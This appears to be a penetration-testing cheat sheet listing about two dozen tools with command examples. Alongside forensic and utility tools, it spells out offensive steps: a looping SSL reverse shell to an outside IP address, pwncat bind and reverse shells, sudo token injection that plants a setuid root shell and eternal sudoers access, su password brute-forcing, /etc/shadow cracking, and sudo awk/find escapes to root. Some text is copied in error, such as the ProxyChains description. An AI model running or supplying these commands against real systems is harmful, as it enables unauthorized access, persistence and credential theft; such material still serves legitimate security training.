Reference List
    1. Tnmap
    2. SearchSploit
    3. suBruteForce
    4. sudo_inject
    5. Foremost
    6. Zsteg
    7. ExifTool
    8. GDB
    9. SublimeText
    10. NCat
    11. PwnCat
    12. SeatBelt
    13. GoBuster
    14. SSHuttle
    15. BloodHound
    16. Evil-WinRM
    17. Armitage
    18. FrameBuffer
    19. JohnTheRipper
    20. ColabCat
    21. SMBMap
    22. enum4linux
    23. ProxyChains
    24. HashID
    25. Axel
    26. GettingShell

Tnmap.py – This program breaks a big network into many small segments to enable parallel scans, multi-hosts task share, and more [Link].

tnmap.py 10.0.0.0/8

SearchSploit – Simple way to search for vulnerabilities on a local copy of the exploit-db.com [Link]. Other sources of vulns/exploits at NIST Search Vulnerability Database [Link], Mitre CVE [Link], and CVE Program Mission [Link].

sudo apt install exploitdb -y
searchsploit wordpress 
sudo -V | grep "Sudo ver" searchsploit "sudo 1.9.5p1"

suBruteForce – Full throttle to get access as a specific user [Link].

./suBF.sh -u username -w top12000.txt -t 0.7 -s 0.007

sudo_inject – Injects process that have valid sudo token and activate our own sudo token [Link].

Will create the binary activate_sudo_token in /tmp. You can use it to activate the sudo token in your session:

bash exploit.sh
/tmp/activate_sudo_token
sudo su

Will create a sh shell in /tmp owned by root with setuid:

bash exploit_v2.sh
/tmp/sh -p

Will create a sudoers file that makes sudo tokens eternal and allows all users to use sudo:

bash exploit_v3.sh
sudo su

Foremost – A forensics tool to recover files based on headers and footers from disk or image file [Link].

sudo apt install foremost
foremost -t jpg,pdf -i image.dd
foremost -t doc,xml -i /dev/sdb1

Zsteg – A Ruby application to detect and extract hidden data in image files [Link].

sudo gem install zsteg
zsteg image.png

ExifTool – An application for reading and writing meta information in a wide variety of files [Link]. Official website [Link].

sudo apt install exiftool
exiftool image.png

GDB – The GNU Project debugger, allows one to see what is going on ‘inside’ a program while it executes or what a program was ‘doing’ at the moment it crashed [Link]. Usually used with PEDA (Python Exploit Development Assistance for GDB), which colorizes and displays disassembly codes, registers, memory information during debugging, and adds extra commands [Link].

sudo apt install gdb
gdb executable
(gdb) run

SublimeText – A very sophisticated text editor for code and markup [Link].

wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo apt-key add -
sudo apt-get install apt-transport-https
echo "deb https://download.sublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list
sudo apt-get update
sudo apt-get install sublime-text
subl script.sh

NCat – A NetCat version by NMAP that accepts SSL [Link].

while true; do sudo ncat --ssl -lv 53 ; done
while true; do ncat --ssl -v 174.88.217.186 53 -e /bin/bash; sleep 5 ; done
python3 -c 'import pty; pty.spawn("/bin/bash")'

PwnCat – A sophisticated bind and reverse shell handler with many features as well as a drop-in replacement or compatible complement to netcat, ncat or socat [Link].

pwncat -l -e '/bin/bash' 4444 -k
pwncat -e '/bin/bash' example.com 4444 --reconn --recon-wait 1
pwncat -e '/bin/bash' example.com 4444 -u --ping-intvl 1

The first example will keep listening (blind) even after disconnect.

The second and third are reverse and reconnect if Ctrl+C interrupts it but the third works over UDP.


SeatBelt – Performs a number of security-oriented host-survey safety checks [Link].

Seatbelt.exe -group=all -full
Seatbelt.exe -group=user
Seatbelt.exe -group=system
Seatbelt.exe -group=slack
Seatbelt.exe -group=chromium
Seatbelt.exe -group=chromium
Seatbelt.exe -group=misc

GoBuster – A tool to brute-force and discover directories, files, and subdomains [Link]..

sudo apt install gobuster
gobuster dir -e -t 50 -u http://example.com/ -w /usr/share/wordlists/dirb/common.txt
gobuster dns -d example.com -w subdomains.txt --wildcard

The first example uses -w to inform the wordlist file, -u to inform the URL or domain, -e for expanded mode, and -t define the number of threads.

On the second example, it looks for subdomains using dns -d and –wildcard detects properly the existence of a wildcard (*.example.com).


SSHuttle – Creates a VPN over the SSH tunnel and allows pivoting into the network laterally [Link]. It does not require any installation or root access on the host machine, just SSHuttle on the client is necessary. Note that ICMP (ping) does not work over this VPN.

sudo apt-get install sshuttle -y
sshuttle -r [email protected] 10.0.0.0/8
sshuttle --dns -vvr [email protected] 0/0

Use the argument -r to set the credentials to login into the host, followed by the network you want to reach over the VPN (192.168.0.0/16 in this example), –dns all the DNS requests will also be tunneled, and 0/0 informs that all the traffic must go through the VPN as well.


BloodHound – A GUI to reveal the hidden and often unintended relationships within an Active Directory environment. It can be used to easily gain a deeper understanding of privilege relationships between objects (like users and groups). [Link].

Run the most recent version of the collector file on the PowerShell of a Windows machine that is connected to an Active Directory:

.\AzureHound.ps1

OR

.\SharpHound.exe

Then transfer the output to the machine where the BloodHound will analyze it.

It can be installed using the official tutorial [Link] or if you are using Kali just follow the commands:

sudo apt-get install bloodhound -y 
sudo neo4j console &
bloodhound &

Go to the page http://localhost:7474/ and enter neo4j as user and password, then change them on the next page.

Use the credentials changed above to connect and import the acquired output files in to BloodHound.


Evil-WinRM – WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol [Link]. This app gives a Remote Power Shell prompt. It can run locally or in a docker container.

evil-winrm -i 10.0.0.1 -u user -p password

Armitage – A free GUI for Metasploit [Link]. See also the licensed GUI for Metasploit called Cobalt Strike at [Link].

sudo msfdb init
sudo apt install armitage -y
sudo armitage

FrameBuffer – It is not a tool but a technique to capture the physical video output and export it to a file to be virtualized or stored. It needs the resolution information to make it visible later.

cat /dev/fb0 > fb.raw
cat /sys/class/graphics/fb0/virtual_size

Now use GIMP to visualize the file.


JohnTheRipper – Tool for crashing hashes [Link]. It is able to find out what kind of hash is being used and adjust the parameters for it automatically.

john single_password.txt
john -w:password.lst user:pass.lst
sudo john /etc/passwd /etc/shadow

58k English words list in upper and lower case [Link].

Tools attached to John:

sudo unshadow /etc/passwd /etc/shadow > unshadow.txt
unique -v -inp=allwords.lst uniques.lst

ColabCat – Use Google Research Colab’s GPU resources to crack hashes with HashCat at [Link] and follow the steps. It is also possible to run John there.

!bash
apt update
apt install john
echo "b50ac41ec20631c7b6be72f070d8ff67" > pass
cat pass
john pass

SMBMap – Lists share drives, permissions, shared contents, uploads/downloads, and even executes remote commands [Link].

smbmap -H 10.0.0.1 -R
smbmap -u user -p password -H host

enum4linux – A combination of the Samba tools: smbclient, rpclient, net, and nmblookup used for enumeration [Link].

enum4linux.pl -v 10.0.0.1
enum4linux.pl -a 10.0.0.1
enum4linux.pl -r 10.0.0.1
enum4linux.pl -u user -p password -U 10.0.0.1

ProxyChains – A combination of the Samba tools: smbclient, rpclient, net, and nmblookup used for enumeration [Link].

proxychains nmap 10.0.0.1

Edit the configuration file /etc/proxychains4.conf and customize if necessary:

dynamic_chain
#strict_chain
chain_len = 2
proxy_dns
[ProxyList]
#socks5 127.0.0.1 9150          # would use Tor Network
socks4 200.200.200.200 9050     # a customized proxy
socks4 200.200.200.100 9050     # a customized proxy
socks4 200.200.100.100 9050     # a customized proxy
socks4 200.100.100.100 9050     # a customized proxy

A good source of proxies can be found at [Link].


HashID РIdentifies the different types of hashes used to encrypt data and especially passwords [Link]. See also a web tool for the same purpose called TunnelsUp [Link].

pip install hashid
hashid -mj '$2y$10$EtzcwxcVdq7D40GIStLA2u4mxfZfUctoD.fufB7NdAJgjq3ACy2Di'
hashid file.txt

Axel – Axel is a multi thread Linux CLI download application [Link]. It works as a download accelerator for commands line interface.

axel -a -n 6 https://example.com/file.gz

Note: -a only shows the progress and -n 6 defines the number of threads.


GettingShell – Is is not a tool but a small collection of unexpected ways to get root access or shell.

sudo awk 'BEGIN {system("/bin/sh")}'
sudo find /etc -exec sh -i \;

Vim or Vi (command line text editor) or the application More (that used Vim) if run by root can get access to any file on the system and even start a shell:

  • :e /etc/passwd
    • open the desired file as the running user
  • :sh
    • get a shell as the running user
  • :shell
    • get a shell as the running user
  • :set shell=/bin/bash
    • used to set a non-default shell if necessary